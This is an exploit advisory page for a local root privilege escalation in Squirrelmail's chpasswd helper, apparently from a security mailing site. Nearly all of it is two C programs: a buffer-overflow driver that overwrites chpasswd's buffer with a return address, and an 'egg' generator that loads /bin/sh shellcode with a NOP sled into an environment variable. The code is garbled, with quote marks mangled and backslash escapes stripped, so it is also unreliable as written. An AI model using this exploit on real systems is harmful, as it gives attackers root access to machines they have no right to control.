‘Squirrelmail Change_passwd Buffer Overflow Exploit’

Summary

‘As we reported in our previous article: Squirrelmail Change_passwd Buffer Overflow, a vulnerability in the product allows local attackers to gain elevated privileges by overflowing an internal buffer. The following exploit code can be used to test your system for the mentioned vulnerability.’

Credit:

‘The information has been provided by SpikE VrM.’


Details

Exploit:
SPK-chpasswd.c:
/*
** Squirremail’s chpasswd local root exploit bY SpikE <spike_vrm at mail.com>
** Bug found bY Matias Neiff <matias at neiff.com.ar>
**
** Usage: Execute setegg before running this exploit
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>

#define BUFSIZE 200

char *Egg;
int EggAddr;
char *chpasswd;

void doExploit()
{
 char Buffer[BUFSIZE];
 int *Ptr = (int *)Buffer;
 int i;

 fprintf(stdout,'[+] Egg address: %#010xn’,EggAddr);

 // Build evil buffer
 for(i=0;i<BUFSIZE-4;i+=4)
  *Ptr++ = EggAddr;
 *Ptr = 0;

 // eXplot it!!
 execl(chpasswd,’chpasswd’,Buffer,’SPK’,’HACKED’,0);

 // If reach here, error
 fprintf(stdout,'[-] %s not found!!!n’,chpasswd);
}

int main(int argc, char **argv)
{
 printf(‘==[ Squirremail’s chpasswd local root exploit bY SpikE <spike_vrm@mail.com> ]==nn’);
 if(argc != 2)
 {
  printf(‘Usage: %s <chpasswd-full-path>nn’,argv[0]);
  exit(0);
 }
 chpasswd = argv[1];
 // Get shellcode address
        Egg = getenv(‘spkEGG’);
        EggAddr = (int)&Egg[0];

 if(EggAddr == 0)
 {
  printf(‘[-] spkEGG not found. Run ‘setegg’ first.n’);
  exit(-1);
 }
 doExploit();

 return(0);
}

setegg.c:
/*
** EGG generator bY SpikE <spike_vrm@mail.com>
**
** Usage: Execute this file before running the exploit
**
*/

#include <stdio.h>
#include <stdlib.h>

#define EGGSIZE 300

char Shellcode[] =
        ‘AAAAAAAx90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90’
        ‘x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90’
        ‘x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90’

        ‘xebx1dx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3x8d’
 ‘x4ex08x31xd2xcdx80xb0x01x31xdbxcdx80xe8xdexffxffxff/bin/sh’;

int main()
{
 char EGG[EGGSIZE];
 char *EGGPtr;
 u_long EGGAddr;

 printf(‘[+] Creating EGGn’);

 memset(EGG,0,EGGSIZE);
 memcpy(EGG,Shellcode,strlen(Shellcode));
 memcpy(EGG,’spkEGG=’,7);
 putenv(EGG);

 system(‘/bin/bash’);
}’

Categories: Exploits